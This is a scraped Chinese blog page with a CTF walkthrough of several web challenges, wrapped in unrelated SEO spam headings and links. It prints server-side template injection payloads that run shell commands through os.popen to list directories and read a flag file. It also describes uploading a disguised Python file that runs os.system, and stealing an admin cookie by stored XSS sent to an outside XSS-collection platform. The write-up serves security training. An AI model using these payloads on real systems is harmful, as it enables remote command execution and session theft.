当前位置: 首页 > news >正文

上海做哪些行业赚钱网站树状型结构优化

上海做哪些行业赚钱,网站树状型结构优化,如何wordpress建站,网站定制一般价格多少平台为“山东安信安全技术有限公司”自研CTF/AWD一体化平台#xff0c;部分赛题采用动态FLAG形式#xff0c;避免直接抄袭答案。 平台有题库、赛事预告、工具库、Writeup库等模块。 ------------------------------- Simple_SSTI_1 启动环境#xff1a; 页面提示传入参数f…            平台为“山东安信安全技术有限公司”自研CTF/AWD一体化平台部分赛题采用动态FLAG形式避免直接抄袭答案。 平台有题库、赛事预告、工具库、Writeup库等模块。 ------------------------------- Simple_SSTI_1 启动环境 页面提示传入参数flag  F12查看源码得到第二个提示 SECRET_KEY(秘钥)是Flask中重要的一个配置值在这题构造语句查看它得到flag SECRET_KEY(秘钥)是Flask中重要的一个配置值在这题构造语句查看它得到flag ------------------------------------------------- Simple_SSTI_2 启动环境 页面提示传入参数flag  f12查看源码发现没有提示信息。 通过{{ config.__class__.__init__.__globals__[os].popen(ls ../).read() }}读取系统文件读取网站系统目录发现如下的文件夹 通过{{ config.__class__.__init__.__globals__[os].popen(ls ../app).read() }}读取读取app目录下的文件发现存在flag文件  通过{{ config.__class__.__init__.__globals__[os].popen(cat ../app/flag).read() }}读取flag内容读取flag内容最终得到flag  ---------------------------------------- Flask_FileUpload 启动环境 发现是上传文件 随便找张图片上传试试  查看源代码f12进入    注释告诉我们会运行python的文件​ 根据需求编写代码  写一个python代码改成jpg或者png格式的文件 import os os.system(cat /flag) ​  上传 看看     在元素中即可查看flag​ ​  ---------------------------------------- 留言板 开启环境​ 提示需登录后台需要使用python平台接收flag 打开场景后出现了下面的界面。​ 看到此类的题目应该和存储型xss有关也就是将恶意代码保存到服务器端即然在服务器端那就是会在后台弹出窗口了所以需要找到后台地址看看能不能爆破进入但是题目提示了说不需要登录后台需要使用xss平台来接收cookies测试一下script代码 发现确实可以读取到。 使用目录扫描工具-御剑进行扫描试试 得到后台管理地址/admin.php  账号密码不知道           需要注意的是该题目提示了无需登录后台需要xss平台接收flag http协议需要http协议的xss平台            所以我们需要找一个xss平台https://xssaq.com/目前我找到的这个是免费可用的其他的都需要付费。 将项目中提供的代码输入留言板中 在查看扫描出来的db.sql本人没扫出来不知道他们怎么扫出来的 # Host: localhost (Version: 5.5.53) # Date: 2019-08-04 16:13:22 # Generator: MySQL-Front 5.3 (Build 4.234)/*!40101 SET NAMES utf8 */;# # Structure for table text #CREATE DATABASE xss DEFAULT CHARACTER SET utf8; use xss; DROP TABLE IF EXISTS text; CREATE TABLE text (Id int(11) NOT NULL AUTO_INCREMENT,text varchar(255) DEFAULT NULL,PRIMARY KEY (Id) ) ENGINEMyISAM DEFAULT CHARSETutf8;# # Data for table text #/*!40000 ALTER TABLE text DISABLE KEYS */; /*!40000 ALTER TABLE text ENABLE KEYS */;# # Structure for table user #DROP TABLE IF EXISTS user; CREATE TABLE user (Id int(11) NOT NULL AUTO_INCREMENT,username varchar(255) DEFAULT NULL,password varchar(255) DEFAULT NULL,PRIMARY KEY (Id) ) ENGINEMyISAM DEFAULT CHARSETutf8;# # Data for table user #/*!40000 ALTER TABLE user DISABLE KEYS */; INSERT INTO user VALUES (1,admin,011be4d65feac1a8); /*!40000 ALTER TABLE user ENABLE KEYS */;底部存在一组 user passwd 尝试解码登录 反射我们刚刚xss语句我们在回到xss平台获得信息 查看获得cookieflag加密信息解码获得flag ------------------------------------------- 滑稽 开启环境 打开为以下界面 查看源代码 获得flag
http://www.hkea.cn/news/14512565/

相关文章:

  • 什么视频直播网站做挣钱深圳福田
  • 火狐浏览器网站开发人员wordpress评论显示游客
  • 作品网站北京哪家公司做网站好
  • 中山网站只设计广告平台源码
  • 门户网站开发维护合同范本建e网手机app
  • 网站空间申请哪个网站是做包装材料珍珠棉包管
  • 从事电子商务的网站建设店面装修设计
  • 深圳微信网站建设公司哪家好wordpress没有页脚选项
  • 网站建设实训指导书企业工商查询
  • 网站建设浦东网站排名监控工具
  • 服务器如何建设多个网站龙信建设集团有限公司网站
  • 天津做网站最权威的公司娄底建设网站
  • 网站链接只显示到文件夹怎么做的徐州网站建设制作工作室
  • 网站建设课程心得体会dedecms做资源下载网站
  • 常州h5网站建设深圳网站制作必找祥奔科技
  • 北海哪家公司做网站建设研发做诱导网站
  • 阿里云 iis 默认网站去哪学网页设计
  • dede添加网站背景网站布局方案
  • 青岛市住房和城乡建设局网站seo外链接
  • 深圳外贸建站模板成都品牌营销策划有限公司
  • 哪个网站做二手车抵押上海建筑设计研究院有限公司招聘
  • 建设银行网站注册用户名西安的网站建设公司
  • html5 微网站布局python编程软件哪个好
  • 株洲网站建设报价方案河北省工程建设信息网
  • 免费做优化的网站网站域名代备案
  • 昆明网站开发推广天津行业网站建设
  • 荣欣建设集团有限公司网站京津冀协同发展9周年
  • 班级网站建设流程步骤中国工程网亿美
  • 什么是微网站系统上海网址登录
  • 口腔建立网站ppt模板免费下载简约